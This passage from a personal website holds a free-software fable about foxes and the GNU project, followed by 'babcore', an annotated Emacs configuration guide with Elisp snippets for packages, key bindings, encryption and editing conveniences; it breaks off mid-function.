English

Here you can find my English pages. When there are enough of them, they might get the same or a similar structure as the German ones.

You can view these pages like a blog by checking the

» new English posts (weblog) «

- they also feature an RSS feed.

You can also find some more of my English writings by looking at the blog entries on LJ which I tagged english.

Best wishes,
Arne

A tale of foxes and freedom

Singing the songs of creation to shape a free world.

One day the silver kit asked the grey one:

“Who made the light, which brightens our singing place?”

The grey one looked at it lovingly and asked the kit to sit with her, for she would tell a story from the old days when the tribe was young.

“Once there was a time, when the world was light and happiness. During the day the sun shone on the savannah, and at night the moon cast the grass in a silver sheen.

It was during that time, when there were fewer animals in the wild, that the GNUs learned to work songs of creation, deep and vocal, and they taught us and everyone their new findings, and the life of our skulk was happiness and love.

But while the GNUs spread their songs and made new songs for every idea they could imagine, others invaded the plains, and they stole away the songs and only allowed singing them their way. And they drowned out the light, and with it went the happiness and love.

And when everyone shivered in cold and darkness, and stillness and despair were drawn over the land, the others created a false light which cast small enclosures into a pale flicker, into which they allowed only those animals who were willing to wear ropes on their throats and limbs, and many animals went to them to escape the darkness, while some fell deeper still and joined the others in enslaving their former friends.

Upon seeing this, the fiercest of the GNUs, the last one of the original herd, was filled with a terrible anger to see the songs of creation turned into a tool for slavery, and he made one special song which created a spark of true light in the darkness which could not be taken away, and which exposed the falsehood in the light of the others. And whenever he sang this song, those who were near him were touched by happiness.

But the others were many and the GNU was alone, and many animals succumbed to the ropes or the ropers and could move no more on their own.

To spread the song, the GNU now searched for other animals who would sing with him, and the song spread, and with it the freedom.

It was during these days, that the GNU met our founders, who lived in golden chains in a palace of glass.

In this palace they thought themselves lucky, and though the light of the palace grew ever paler and the chains grew heavier with every passing day, they didn't leave, because they feared the utter darkness out there.

When they then saw the GNU, they asked him: "Isn't your light weaker than this whole palace?" and the GNU answered: "Not if we sing it together", and they asked "But how will we eat in the darkness?" and the GNU answered "you'll eat in the light of your songs, and plants will grow wherever you sing", and they asked "But is it a song of foxes?" and the GNU said: "You can make it so", and he began to sing, and when our founders joined in, the light became shimmering silver like the moon they still remembered from the days and nights of light, and they rejoiced in its brightness.

And whenever this light touched the glass of the palace, the glass paled and showed its true being, and where the light touched the chains, they withered, and our founders went into the darkness with the newfound light of the moon as companion, and they thanked the GNU and promised to help him whenever they were needed.

Then they set off to learn the many songs of the world and to spread the silver light of the moon wherever they came.

This is how our founders learned to sing the light, which brightens every one of our songs, and as our skulk grew bigger, the light grew stronger and it became a little moon, which will grow with each new kit, until its light will fill the whole world again one day.”

The grey one looked around where many kits had quietly found a place, and then she laughed softly, before she got up to fetch herself a meal for the night, and the kits began to speak all at once about her story. And they spoke until the silver kit raised its voice and sang the song of moonlight1, and they joined in and the song filled their hearts with joy and the air with light, and they knew that wherever they would travel, this skulk was where their hearts felt at home.

PS: This story is far less loosely based on facts than it looks. There are songs of creation, namely computer programs, which once were free and which were truly taken away and used for casting others into darkness. And there was and still is the fierce GNU with his song of light and freedom, and he did spread it to make it into GNU/Linux and found the free software community we know today. If you want to know more about the story as it happened in our world, just read the less flowery story of Richard Stallman, free hackers and the creation of GNU or listen to the free song Infinite Hands.

PPS: I originally wrote this story for Phex, a free Gnutella-based p2p filesharing program which also has an anonymous sibling (i2phex). It’s an even stronger fit for Firefox, though.

PPPS: License: This text is given into the public under the GNU FDL without invariant sections and other free licenses by Arne Babenhauserheide (who has the copyright on it).

P4S: Alternate link: http://www.draketo.de/english/tale-of-foxes-and-freedom


  1. To make it perfectly clear: This moonlight is definitely not the abhorrent and patent-stricken Silverlight port from the Mono project. The foxes sing a song of freedom. They wouldn’t accept the shackles of Microsoft after having found their freedom. Sadly the PR departments of some groups try to take over analogies and strong names. Don’t be fooled by them. The moonlight in our songs is the light coming from the moon which resonates in the voices of the kits. And that light is free as in freedom, from copyright restrictions as well as from patent restrictions – though there certainly are people who would love to patent the light of the moon. Those are the ones we need to fight to defend our freedom. 

Emacs

Cross platform, Free Software, almost all features you can think of, graphical and in the shell: Learn once, use for everything.

» Get Emacs «

Emacs is a self-documenting, extensible editor, a development environment and a platform for lisp-programs - for example programs to make programming easier, but also for todo-lists on steroids, reading email, posting to identi.ca, and a host of other stuff (learn lisp).

It is one of the origins of GNU and free software (Emacs History).

In Markdown-mode it looks like this:

Emacs with Markdown mode

More on Emacs on my German Emacs page.

Babcore: Emacs Customizations everyone should have

Update (2017-05): babcore is at 0.2, but I cannot currently update the marmalade package.

1 Intro

PDF-version (for printing)

Package (to install)

orgmode-version (for editing)

repository (for forking)

project page (for fun ☺)

Emacs Lisp (to use)

I have been tweaking my Emacs configuration for years now, and I have added quite a bit of cruft. But while searching for the right way to work, I also found some gems which I sorely miss in pristine Emacs.

This file is about those gems.

Babcore is strongly related to Prelude. Actually it is just like Prelude, but with the stuff I consider essential, and it stays close to pristine Emacs, so you can still work at a coworker's desk.

But before we start, there is one crucial piece of advice which everyone who uses Emacs should know:

C-g: abort

Hold control and hit g.

That gets you out of almost any situation. If anything goes wrong, just hit C-g repeatedly till the problem is gone - or until you have cooled off far enough to realize that a no-op is the best way to react.

To repeat: If anything goes wrong, just hit C-g.

2 Package Header

As an Emacs package, babcore needs a proper header.

;; Copyright (C) 2013 Arne Babenhauserheide

;; Author: Arne Babenhauserheide (and various others in Emacswiki and elsewhere).
;; Maintainer: Arne Babenhauserheide
;; Created: 03 April 2013
;; Version: 0.1.0
;; Keywords: core configuration

;; This program is free software; you can redistribute it and/or
;; modify it under the terms of the GNU General Public License
;; as published by the Free Software Foundation; either version 3
;; of the License, or (at your option) any later version.

;; This program is distributed in the hope that it will be useful,
;; but WITHOUT ANY WARRANTY; without even the implied warranty of
;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
;; GNU General Public License for more details.

;; You should have received a copy of the GNU General Public License
;; along with this program. If not, see <http://www.gnu.org/licenses/>.

;;; Commentary:
;; Quick Start / installation:
;; 1. Download this file and put it next to other files Emacs includes
;; 2. Add this to your .emacs file and restart Emacs:
;; 
;;      (require 'babcore)
;;
;; Alternatively install via package.el:
;;
;;      (require 'package)
;;      (add-to-list 'package-archives '("marmalade" . "http://marmalade-repo.org/packages/"))
;;      (package-refresh-contents)
;;      (package-install 'babcore)
;; 
;; Use Case: Use a common core configuration so you can avoid the
;;   tedious act of gathering all the basic stuff over the years and
;;   can instead concentrate on the really cool new stuff Emacs offers
;;   you.
;;

;;; Change Log:

;; 2016-06-05 - 0.1.0: replace desktop with better savehist config and
;;                     cleanup babcore. Replace flymake with flycheck.
;;                     Remove the eval-region key-chord. Simplify
;;                     x-urgent. Fix switching back from full-screen
;;                     mode. Remove babcore-shell-execute, since
;;                     async-shell-command (M-&) is a built-in which
;;                     does the job better. Add C-M-. as third alias
;;                     for goto-last-change. Add find-file-as-root and
;;                     a few fixes for encumbering behavior.
;; 2013-11-02 - Disable clipboard sync while exporting with org-mode
;;              org-export-dispatch
;; 2013-10-22 - More useful frame titles
;; 2013-04-03 - Minor adjustments
;; 2013-02-29 - Initial release

;;; Code:

Additionally it needs the proper last line. See finish up for details.

3 Feature Gems

3.1 package.el, full setup

This is the first thing you need in Emacs 24. It gives you a convenient way to install just about anything, so you really should use it.

Also I hope that it will help consolidate the various emacs tips which float around into polished packages by virtue of giving people ways to actually get the package by name - and keep it updated almost automatically.

;; Convenient package handling in emacs

(require 'package)
;; use packages from marmalade
(add-to-list 'package-archives '("marmalade" . "http://marmalade-repo.org/packages/"))
;; and the old elpa repo
(add-to-list 'package-archives '("elpa-old" . "http://tromey.com/elpa/"))
;; and automatically parsed versiontracking repositories.
(add-to-list 'package-archives '("melpa" . "http://melpa.milkbox.net/packages/"))

;; Make sure a package is installed
(defun package-require (package)
  "Install a PACKAGE unless it is already installed 
or a feature with the same name is already active.

Usage: (package-require 'package)"
  ; try to activate the package with at least version 0.
  (package-activate package '(0))
  ; try to just require the package. Maybe the user has it in his local config

  (condition-case nil
      (require package)
    ; if we cannot require it, it does not exist, yet. So install it.
    (error (progn
             (package-install package)
             (require package)))))

;; Initialize installed packages
(package-initialize)  
;; package init not needed, since it is done anyway in emacs 24 after reading the init
;; but we have to load the list of available packages, if it is not available, yet.
(when (not package-archive-contents)
  (with-timeout (15 (message "updating package lists failed due to timeout"))
    (package-refresh-contents)))

3.2 Flycheck

Flycheck is an example of a quite complex feature which really everyone should have.

It can check any kind of code, and actually anything which can be verified with a program which gives line numbers.

This is a drop-in replacement for the older flymake. See Spotlight: Flycheck, a Flymake replacement for reasons to switch to flycheck.

;; Flycheck: On the fly syntax checking
(package-require 'flycheck)
(add-hook 'after-init-hook #'global-flycheck-mode)
; stronger error display
(defface flycheck-error
  '((t (:foreground "red" :underline (:color "Red1" :style wave) :weight bold)))
  "Flycheck face for errors"
  :group 'flycheck)

3.3 auto-complete

This gives you inline auto-completion preview with an overlay window - even in the text console. In part this goes as far as API hints (for example for elisp code). Absolutely essential.

;; Inline auto completion and suggestions
(package-require 'auto-complete)
(require 'cl) ; the `loop` macro used below comes from cl
;; avoid competing with org-mode templates.
(add-hook 'org-mode-hook
          (lambda ()
            (make-local-variable 'ac-stop-words)
            (loop for template in org-structure-template-alist do
                  (add-to-list 'ac-stop-words 
                               (concat "<" (car template))))))

3.4 ido

To select a file in a huge directory, just type a few letters from that file in the correct order, leaving out the non-identifying ones. Darn cool!

; use ido mode for file and buffer Completion when switching buffers
(require 'ido)
(ido-mode t)
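
If you also want to leave out letters in the middle of a name, flex matching is one setq away. This is an optional tweak, not part of the minimal babcore setup above:

; also match when letters in the middle of the name are left out
(setq ido-enable-flex-matching t)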

3.5 printing

Printing in pristine emacs is woefully inadequate, even though it is a standard function in almost all other current programs.

It can be easy, though:

;; Convenient printing
(require 'printing)
(pr-update-menus t)
; make sure we use localhost as cups server
(setenv "CUPS_SERVER" "localhost")
(package-require 'cups)

3.6 outlining everywhere

Code folding is pretty cool to get an overview of a complex structure. So why shouldn’t you be able to do that with any kind of structured data?

; use allout minor mode to have outlining everywhere.
(allout-mode)

3.7 Syntax highlighting

Font-lock is the emacs name for syntax highlighting - in just about anything.

; syntax highlighting everywhere
(global-font-lock-mode 1)

3.8 org and babel

Org-mode is that kind of simple thing which evolves to a way of life when you realize that most of your needs actually are simple - and that the complex things can be done in simple ways, too.

It provides simple todo-lists, inline-code evaluation (as in this file) and a full-blown literate programming, reproducible research publishing platform. All from the same simple basic structure.

It might change your life… and it is the only planning solution which ever prevailed against my way of life and organization.

; Activate org-mode
(require 'org)
; and some more org stuff

; http://orgmode.org/guide/Activation.html#Activation

; The following lines are always needed.  Choose your own keys.
(add-to-list 'auto-mode-alist '("\\.org\\'" . org-mode))
; And add babel inline code execution
; babel, for executing code in org-mode.
(org-babel-do-load-languages
 'org-babel-load-languages
 ; load all language marked with (lang . t).
 '((C . t)
   (R . t)
   (asymptote)
   (awk)
   (calc)
   (clojure)
   (comint)
   (css)
   (ditaa . t)
   (dot . t)
   (emacs-lisp . t)
   (fortran)
   (gnuplot . t)
   (haskell)
   (io)
   (java)
   (js)
   (latex)
   (ledger)
   (lilypond)
   (lisp)
   (matlab)
   (maxima)
   (mscgen)
   (ocaml)
   (octave)
   (org . t)
   (perl)
   (picolisp)
   (plantuml)
   (python . t)
   (ref)
   (ruby)
   (sass)
   (scala)
   (scheme)
   (screen)
   (sh . t)
   (shen)
   (sql)
   (sqlite)))

3.9 Nice line wrapping

If you’re used to other editors, you’ll want to see lines wrapped nicely at word boundaries instead of lines which either get cut off at the window edge or broken in the middle of a word.

global-visual-line-mode gives you that.

; Add proper word wrapping
(global-visual-line-mode t)

3.10 goto-chg

This is the kind of feature which looks tiny: Go to the place where you last changed something.

And then you get used to it and it becomes absolutely indispensable.

; go to the last change
(package-require 'goto-chg)
(global-set-key [(control .)] 'goto-last-change)
; M-. can conflict with etags tag search. But C-. can get overwritten
; by flyspell-auto-correct-word. And goto-last-change needs a really
; fast key.
(global-set-key [(meta .)] 'goto-last-change)
; ensure that even in worst case some goto-last-change is available
(global-set-key [(control meta .)] 'goto-last-change)

3.11 flyspell

Whenever you write prose, a spellchecker is worth a lot, but it should not unnerve you.

Install aspell, then activate flyspell-mode whenever you need it.

It needs some dabbling, though, to make it work nicely with non-English text.

(require 'flyspell)
; Make german umlauts work.
(setq locale-coding-system 'utf-8)
(set-terminal-coding-system 'utf-8)
(set-keyboard-coding-system 'utf-8)
(set-selection-coding-system 'utf-8)
(prefer-coding-system 'utf-8)

; aspell and flyspell
(setq-default ispell-program-name "aspell")

; make aspell faster at the cost of some accuracy
(setq ispell-extra-args '("--sug-mode=ultra" "-w" "äöüÄÖÜßñ"))
(setq ispell-list-command "list")
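
To actually switch languages while writing, M-x ispell-change-dictionary is the command to know. A tiny convenience wrapper could look like this - just a sketch, and the dictionary name "de_DE" is an assumption about which aspell dictionaries you have installed; it is not part of babcore:

; quickly switch to a German dictionary and recheck the buffer
; (adjust "de_DE" to a dictionary your aspell installation provides)
(defun flyspell-switch-to-german ()
  (interactive)
  (ispell-change-dictionary "de_DE")
  (flyspell-buffer))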

3.12 control-lock

If you have to do the same action repeatedly, for example with flyspell hitting next-error and next-correction hundreds of times, the need to press control can really be a strain for your fingers.

Sure, you can use viper-mode and retrain your hands for the completely alien command set of vim.

A simpler solution is adding a sticky control key - and that’s what control-lock does: You get modal editing with your standard emacs commands.

Since I am German, I simply use the German umlauts to toggle the control-lock. You will likely want to choose your own keys here.

; control-lock-mode, so we can enter a vi style command-mode with standard emacs keys.
(package-require 'control-lock)
; also bind M-ü and M-ä to toggling control lock.
(global-set-key (kbd "M-ü") 'control-lock-toggle)
(global-set-key (kbd "C-ü") 'control-lock-toggle)
(global-set-key (kbd "M-ä") 'control-lock-toggle)
(global-set-key (kbd "C-ä") 'control-lock-toggle)
(global-set-key (kbd "C-z") 'control-lock-toggle)

3.13 Basic key chords

This is the second trick for saving your pinky. Yes, Emacs is hard on the pinky. Even if it were completely designed to avoid strain on the pinky, it would still be hard, because any system in which you do not have to reach for the mouse is hard on the pinky.

But it also provides some of the neatest tricks to reduce that strain, so you can make Emacs your pinky saviour.

The key chord mode allows you to hit any two keys at (almost) the same time to invoke commands. Since this can interfere with normal typing, I would only use it for letters which are rarely typed after each other.

These default chords have proven themselves to be useful in years of working with Emacs.

; use key chords to invoke commands
(package-require 'key-chord)
(key-chord-mode 1)
; buffer actions
(key-chord-define-global "vb"     'eval-buffer)
(key-chord-define-global "cy"     'yank-pop)
(key-chord-define-global "cg"     "\C-c\C-c")
; frame actions
(key-chord-define-global "xo"     'other-window);
(key-chord-define-global "x1"     'delete-other-windows)
(key-chord-define-global "x0"     'delete-window)
(defun kill-this-buffer-if-not-modified ()
  (interactive)
  ; taken from menu-bar.el
  (if (menu-bar-non-minibuffer-window-p)
      (kill-buffer-if-not-modified (current-buffer))
    (abort-recursive-edit)))
(key-chord-define-global "xk"     'kill-this-buffer-if-not-modified)
; file actions
(key-chord-define-global "bf"     'ido-switch-buffer)
(key-chord-define-global "cf"     'ido-find-file)
(key-chord-define-global "vc"     'vc-next-action)

To complement these tricks, you should also install and use workrave or at least type-break-mode.

3.14 X11 tricks

These are ways to improve the integration of Emacs in a graphical environment.

We have this cool editor. But it is from the 90s, and some of the more modern concepts of graphical programs have not yet been integrated into its core. Maybe because everyone just adds them to the custom setup :)

On the other hand, Emacs always provided split windows and many of the “new” window handling functions in dwm and similar - along with a level of integration with which normal graphical desktops still have to catch up. Open a file, edit it as text, quickly switch to org-mode to be able to edit an ascii table more efficiently, then switch to html mode to add some custom structure - and all that with a consistent set of key bindings.

But enough with the glorification, let’s get to the integration of stuff where Emacs arguably still has weaknesses.

3.14.1 frame-to-front

Get the current Emacs frame to the front. You can for example call this via emacsclient and set it as a keyboard shortcut in your desktop (for me it is F12):

emacsclient -e "(show-frame)"

This sounds much easier than it proves to be in the end… but luckily you only have to solve it once, then you can google it anywhere…

(defun show-frame (&optional frame)
  "Show the current Emacs frame or the FRAME given as argument.

And make sure that it really shows up!"
  (let ((frame (or frame (selected-frame))))
    (raise-frame frame)
    ; yes, you have to call this twice. Don’t ask me why…
    ; select-frame-set-input-focus calls x-focus-frame and does a bit of
    ; additional magic.
    (select-frame-set-input-focus frame)
    (select-frame-set-input-focus frame)))

3.14.2 urgency hint

Make Emacs announce itself in the tray.

;; let emacs blink when something interesting happens.
;; in KDE this marks the active Emacs icon in the tray.
(defun x-urgency-hint (frame arg &optional source)
  "Set the x-urgency hint for FRAME to ARG:

- If arg is nil, unset the urgency.
- If arg is any other value, set the urgency.

If you unset the urgency, you still have to visit the frame to make the urgency setting disappear (at least in KDE)."
  (let* ((wm-hints (append (x-window-property
                            "WM_HINTS" frame "WM_HINTS" source nil t)
                           nil))
         (flags (car wm-hints)))
    (setcar wm-hints
            (if arg
                (logior flags #x100)
              (logand flags (lognot #x100))))
    (x-change-window-property "WM_HINTS" wm-hints frame "WM_HINTS" 32 t)))

(defun x-urgent (&optional arg)
  "Mark the current emacs frame as requiring urgent attention. 

With a prefix argument which does not equal a boolean value of nil, remove the urgency flag (which might or might not change display, depending on the window manager)."
  (interactive "P")
  (let ((frame (selected-frame)))
    (x-urgency-hint frame (not arg))))
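
As a usage sketch (this assumes you chat with ERC and have erc-match enabled; it is not part of babcore): make the frame demand attention whenever someone mentions your nick.

;; example: flash the urgency hint when your nick is mentioned in ERC
(add-hook 'erc-text-matched-hook
          (lambda (match-type nickuserhost message)
            (when (eq match-type 'current-nick)
              (x-urgent))))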

3.14.3 fullscreen mode

Hit F11 to enter fullscreen mode. Any self-respecting program should have that… and now Emacs does, too.

; fullscreen, taken from http://www.emacswiki.org/emacs/FullScreen#toc26
; should work for X and OS X with emacs 23.x (TODO find minimum version).
; for windows it uses (w32-send-sys-command #xf030) (#xf030 == 61488)
(defvar babcore-fullscreen-p nil
  "Check if fullscreen is on or off")
(defvar babcore-stored-frame-width nil 
  "width of the frame before going fullscreen")
(defvar babcore-stored-frame-height nil
  "height of the frame before going fullscreen")

(defun babcore-non-fullscreen ()
  (interactive)
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND restore #xf120
      (w32-send-sys-command 61728)
    (progn (set-frame-parameter nil 'fullscreen nil)
           (set-frame-parameter nil 'width 
                                (if babcore-stored-frame-width
                                    babcore-stored-frame-width 82))
           (sleep-for 0 1) ; 1ms sleep: workaround to avoid unsetting the width in the next command
           (set-frame-parameter nil 'height
                                (if babcore-stored-frame-height 
                                    babcore-stored-frame-height 42)))))

(defun babcore-fullscreen ()
  (interactive)
  (setq babcore-stored-frame-width (frame-width))
  (setq babcore-stored-frame-height (frame-height))
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND maximize #xf030
      (w32-send-sys-command 61488)
    (set-frame-parameter nil 'fullscreen 'fullboth)))

(defun toggle-fullscreen ()
  (interactive)
  (setq babcore-fullscreen-p (not babcore-fullscreen-p))
  (if babcore-fullscreen-p
      (babcore-fullscreen)
    (babcore-non-fullscreen)))

(global-set-key [f11] 'toggle-fullscreen)

3.14.4 default key bindings

I always hate it when some usage pattern which is consistent almost everywhere fails with some program. Especially if that is easily avoidable.

This code fixes that for Emacs in KDE.

; Default KDE keybindings to make emacs nicer integrated into KDE. 

; uncomment the next line to let Emacs treat C-m as its own key (decoded
; as C-1), so that C-m can toggle the menu bar as described below.
; (define-key input-decode-map "\C-m" [?\C-1])

(defun revert-buffer-preserve-modes ()
  "Revert the current buffer while preserving its major and minor modes."
  (interactive)
  (revert-buffer t nil t))

; C-m shows/hides the menu bar - thanks to http://stackoverflow.com/questions/2298811/how-to-turn-off-alternative-enter-with-ctrlm-in-linux
; f5 reloads
(defconst kde-default-keys-minor-mode-map
  (let ((map (make-sparse-keymap)))
    (set-keymap-parent map text-mode-map)
    (define-key map [f5] 'revert-buffer-preserve-modes)
    (define-key map [?\C-1] 'menu-bar-mode)
    (define-key map [?\C-+] 'text-scale-increase)
    (define-key map [?\C--] 'text-scale-decrease) ; shadows 'negative-argument which is also available via M-- and C-M--, though.
    (define-key map [C-kp-add] 'text-scale-increase)
    (define-key map [C-kp-subtract] 'text-scale-decrease)
    map)
  "Keymap for `kde-default-keys-minor-mode'.")

;; Minor mode for keypad control
(define-minor-mode kde-default-keys-minor-mode
  "Adds some default KDE keybindings"
  :global t
  :init-value t
  :lighter ""
  :keymap 'kde-default-keys-minor-mode-map
  )

3.14.5 Useful Window/frame titles

The titles of windows of GNU Emacs normally look pretty useless (just stating emacs@host), but it’s easy to make them display useful information:

;; Set the frame title as by http://www.emacswiki.org/emacs/FrameTitle
(setq frame-title-format (list "%b ☺ " (user-login-name) "@" (system-name) "%[ - GNU %F " emacs-version)
      icon-title-format (list "%b ☻ " (user-login-name) "@" (system-name) " - GNU %F " emacs-version))

Now we can always see the name of the open buffer in the frame. No more searching for the right emacs window to switch to in the window list.

3.15 Insert unicode characters

Actually you do not need any configuration here. Just use

M-x ucs-insert

to insert any unicode character. If you want to see the characters while selecting, have a look at xub-mode from Ergo Emacs.
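
If you use it a lot, a key binding might be worth it (the key is just a suggestion; newer Emacs versions also offer the same thing as insert-char on C-x 8 RET):

; quick access to unicode insertion - pick any free key you like
(global-set-key (kbd "C-c 8") 'ucs-insert)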

3.16 Highlight TODO and FIXME in comments

This is a default feature in most IDEs. Since Emacs allows you to build your own IDE, it does not offer it by default… but it should, since that does not disturb anything. So we add it.

fic-ext-mode highlights TODO and FIXME in comments for common programming languages.

;; Highlight TODO and FIXME in comments 
(package-require 'fic-ext-mode)
(defun add-something-to-mode-hooks (mode-list something)
  "helper function to add a callback to multiple hooks"
  (dolist (mode mode-list)
    (add-hook (intern (concat (symbol-name mode) "-mode-hook")) something)))

(add-something-to-mode-hooks '(c++ tcl emacs-lisp python text markdown latex) 'fic-ext-mode)

3.17 Save macros as functions

Now for something which should really be provided by default: You just wrote a cool emacs macro, and you are sure that you will need that again a few times.

Well, then save it!

In standard emacs that needs multiple steps. And I hate that. Something as basic as saving a macro should only need one single step. It does now (and Emacs is great, because it allows me to do this!).

This bridges the gap between function definitions and keyboard macros, making keyboard macros something like first class citizens in your Emacs.

; save the current macro as reusable function.
(defun save-current-kbd-macro-to-dot-emacs (name)
  "Save the current macro as named function definition inside
your initialization file so you can reuse it anytime in the
future."
  (interactive "SSave Macro as: ")
  (name-last-kbd-macro name)
  (save-excursion 
    (find-file-literally user-init-file)
    (goto-char (point-max))
    (insert "\n\n;; Saved macro\n")
    (insert-kbd-macro name)
    (insert "\n")))
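
A quick usage sketch (the macro name my-macro is arbitrary): record a macro with F3 … F4, then save it:

F3 … do some editing … F4
M-x save-current-kbd-macro-to-dot-emacs
Save Macro as: my-macro

From then on M-x my-macro replays it, even in future sessions.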

3.18 Transparent GnuPG encryption

If you have a diary or similar, you should really use this. It only takes a few lines of code, but these few lines are the difference between encryption for those who know they need it and encryption for everyone.

; Activate transparent GnuPG encryption.
(require 'epa-file)
(epa-file-enable)
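
Usage is as simple as it gets: just visit a file with a .gpg suffix, for example ~/diary.org.gpg. Emacs asks for the recipient key (or a passphrase for symmetric encryption) when you save and decrypts transparently when you open the file again.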

3.19 Colored shell commands

A shell without colors is really hard to read. Use M-& to run your shell-commands asynchronously and in shell-mode (via async-shell-command).
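
For example (just an illustration), M-& ls --color=always RET should give you a colorized listing in the *Async Shell Command* buffer.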

3.20 Save backups in ~/.local/share/emacs-saves

This is mostly an aesthetic change: use the directories from the freedesktop.org specification for backup files.

Thanks to the folks at CERN for this.

(setq backup-by-copying t      ; don't clobber symlinks
      backup-directory-alist
      '(("." . "~/.local/share/emacs-saves"))    ; don't litter my fs tree
      delete-old-versions t
      kept-new-versions 6
      kept-old-versions 2
      version-control t)       ; use versioned backups

3.21 Basic persistency

If I restart the computer I want my editor to make it easy for me to continue where I left off.

It’s bad enough that most likely my brain buffers were emptied. At least my editor should remember how to go on.

3.21.1 saveplace

If I reopen a file, I want to start at the line at which I was when I closed it.

; save the place in files
(require 'saveplace)
(setq-default save-place t)

3.21.2 savehist

And I want to be able to call my recent commands in the minibuffer. I normally don’t type the full command name anyway, but rather C-r followed by a small part of the command. Losing that on restart really hurts, so I want to avoid that loss.

; save minibuffer history
(require 'savehist)
;; increase the default history cutoff
(setq history-length 500)
(savehist-mode t)
(setq savehist-additional-variables
      '(regexp-search-ring
        register-alist))

If this does not suffice for you, have a look at desktop, the chainsaw of Emacs persistency.

3.22 use the system clipboard

Finally one more minor adaptation: treat the clipboard gracefully. This is a tightrope stunt and getting it wrong can feel awkward.

This is the only setting for which I’m not sure that I got it right, but it’s what I use…

(setq x-select-enable-clipboard t)

But do not synchronize anything to the clipboard or primary selection (mouse selection) while exporting an org-mode file. When clipboard synchronization is enabled during export, compiling an org-mode file to PDF locks KDE - I think it does so by filling up the clipboard. So clipboard synchronization is disabled during the export (see the advice below), and I use the mouse selection to transfer text from Emacs to other programs.

; When I have x-select-enable-clipboard enabled, compiling an org-mode file to PDF locks
; KDE - I think it does so by filling up the clipboard.
(defadvice org-export-dispatch (around org-export-dispatch-no-clipboard-advice)
  "Do not clobber the system clipboard while compiling an org-mode file with `org-export'."
  (let ((select-active-regions nil)
        (x-select-enable-clipboard nil)
        (x-select-enable-primary nil)
        (interprogram-cut-function nil)
        (interprogram-paste-function nil))
    ad-do-it))
(ad-activate 'org-export-dispatch t)

3.23 Add license headers automatically

In case you mostly write free software, you might be as weary of hunting for the license header and copy pasting it into new files as I am. Free licenses, and especially copyleft licenses, are one of the core safeguards of free culture, because they give free software developers an edge over proprietarizing folks. But they are a pain to add to every file…

Well: No more. We now have legalese mode to take care of the inconvenient legal details for us, so we can focus on the code we write. Just call M-x legalese to add a GPL header, or C-u M-x legalese to choose another license.

(package-require 'legalese)

3.24 Find file as root

When I needed to open a file as root to do a quick edit, I used to drop into a shell and run sudo nano FILE, just because that was faster. Since I started using find-current-as-root, I no longer do that: Opening the file as root is now convenient enough in Emacs to no longer tempt me to drop to the shell.

;;; Open files as root - quickly
(defcustom find-file-root-prefix "/sudo:root@localhost:"
  "Tramp root prefix to use."
  :type 'string)

(defun find-file-as-root ()
  "Like `ido-find-file', but automatically edit the file with
root privileges (using tramp/sudo) if the file is not writable by
the user."
  (interactive)
  (let ((file (ido-read-file-name "Edit as root: ")))
    (unless (file-writable-p file)
      (setq file (concat find-file-root-prefix file)))
    (find-file file)))
;; or some other keybinding...
;; (global-set-key (kbd "C-x F") 'find-file-as-root)

(defun find-current-as-root ()
  "Reopen current file as root"
  (interactive)
  (set-visited-file-name (concat find-file-root-prefix (buffer-file-name)))
  (setq buffer-read-only nil))

3.25 Fixes

This stuff should become obsolete, but at the moment it is still needed to improve the Emacs Experience.

;;;;;;;;;;;;;
;;; Fixes ;;;
;;;;;;;;;;;;;

3.25.1 Comint: recognize password in all languages

;; Make comint recognize passwords in virtually all languages.
(defcustom comint-password-prompt-regexp
  (concat
   "\\(^ *\\|"
   (regexp-opt
    '("Enter" "enter" "Enter same" "enter same" "Enter the" "enter the"
      "Old" "old" "New" "new" "'s" "login"
      "Kerberos" "CVS" "UNIX" " SMB" "LDAP" "[sudo]" "Repeat" "Bad") t)
   " +\\)"
   (regexp-opt
    '("Adgangskode" "adgangskode" "Contrasenya" "contrasenya" "Contraseña" "contraseña" "Geslo" "geslo" "Hasło" "hasło" "Heslo" "heslo" "Iphasiwedi" "iphasiwedi" "Jelszó" "jelszó" "Lozinka" "lozinka" "Lösenord" "lösenord" "Mot de passe " "Mot de Passe " "mot de Passe " "mot de passe " "Mật khẩu " "mật khẩu" "Parola" "parola" "Pasahitza" "pasahitza" "Pass phrase" "pass Phrase" "pass phrase" "Passord" "passord" "Passphrase" "passphrase" "Password" "password" "Passwort" "passwort" "Pasvorto" "pasvorto" "Response" "response" "Salasana" "salasana" "Senha" "senha" "Wachtwoord" "wachtwoord" "slaptažodis" "slaptažodis" "Лозинка" "лозинка" "Пароль" "пароль" "ססמה" "كلمة السر" "गुप्तशब्द" "शब्दकूट" "গুপ্তশব্দ" "পাসওয়ার্ড" "ਪਾਸਵਰਡ" "પાસવર્ડ" "ପ୍ରବେଶ ସଙ୍କେତ" "கடவுச்சொல்" "సంకేతపదము" "ಗುಪ್ತಪದ" "അടയാളവാക്ക്" "රහස්පදය" "ពាក្យសម្ងាត់ ៖ " "パスワード" "密码" "密碼" "암호"))
   "\\(?:\\(?:, try\\)? *again\\| (empty for no passphrase)\\| (again)\\)?\
\\(?: for [^:]+\\)?:\\s *\\'")
  "Regexp matching prompts for passwords in the inferior process.
This is used by `comint-watch-for-password-prompt'."
  :version "24.3"
  :type 'regexp
  :group 'comint)

3.25.2 Autoconf-mode builtins

;; Mark all AC_* and AS_* functions as builtin.
(add-hook 'autoconf-mode-hook 
          (lambda () 
            (add-to-list 'autoconf-font-lock-keywords '("\\(\\(AC\\|AS\\|AM\\)_.+?\\)\\((\\|\n\\)" (1 font-lock-builtin-face)))))

3.25.3 Do not beep on alt-gr/M4

; tell emacs to ignore alt-gr clicks needed for M4 in the Neo Layout.
(define-key special-event-map (kbd "<key-17>") 'ignore)
(define-key special-event-map (kbd "<M-key-17>") 'ignore)

3.25.4 yank-pop should just yank on first invocation

When you run yank-pop after a yank, it replaces the yanked text. When you did not do a yank before, it errors out.

This change makes yank-pop yank instead, so you can simply hit M-y (or the cy key chord from above) repeatedly to first yank and then cycle through the yank history.

; yank-pop should yank if the last command was no yank.
(defun yank-pop (&optional arg)
  "Replace just-yanked stretch of killed text with a different stretch.
At such a time, the region contains a stretch of reinserted
previously-killed text.  `yank-pop' deletes that text and inserts in its
place a different stretch of killed text.

With no argument, the previous kill is inserted.
With argument N, insert the Nth previous kill.
If N is negative, this is a more recent kill.

The sequence of kills wraps around, so that after the oldest one
comes the newest one.

When this command inserts killed text into the buffer, it honors
`yank-excluded-properties' and `yank-handler' as described in the
doc string for `insert-for-yank-1', which see."
  (interactive "*p")
